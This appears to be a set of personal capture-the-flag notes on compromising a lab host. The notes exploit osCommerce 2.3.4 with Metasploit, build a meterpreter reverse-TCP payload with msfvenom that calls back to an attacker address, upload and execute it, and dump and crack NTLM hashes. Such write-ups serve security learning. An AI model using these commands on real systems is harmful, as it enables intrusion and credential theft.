New Vocabulary

• LM hash (LanMan Hash)
  • a compromised password hashing function that was the primary hash that Microsoft LAN manager and Windows used to store passwords
• NTLM (New Technology LAN Manager)
  • a suite of Microsoft security protocols intended to provide authentication, integrity, and confidentiality to users. NTLM is a challenge-response authentication protocol used to authenticate a client to a resource on an Active Directory domain or a server running a stand-alone Windows computer.

Accessing MariaDB (unauthorized)

• mysql -h 10.10.120.20 -u root
  • Not allowed to connect to this MariaDB server from IP

Exploit osCommerce 2.3.4

https://www.exploit-db.com/exploits/44374

• Use [[MetaSploit]] to exploit an admin setup error in the /install/ directory
  • This pops a meterpreter reverse TCP shell
    • This was a php/meterpreter which has limited options

Upgrade meterpreter shell by using msfvenom

• Here we craft a new payload to be uploaded through the php/meterpreter shell: msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.6.69.101 LPORT=4448 -f exe -o meterpreter.exe
• Open a new msfconsole to listen for the reverse TCP connection msf6 > use exploit/multi/handler
• Upload the exploit to the remote machine using the php/meterpreter: meterpreter > upload ~/Downloads/meterpreter.exe C:/
• Then execute the uploaded payload: execute -f meterpreter.exe
• The listening msfconsole will now open a windows/meterpreter

Getting the flags

• Use hashdump to get NTLM hash
  • Use crackstation to get the password
• root.txt is in /users/administrator/desktop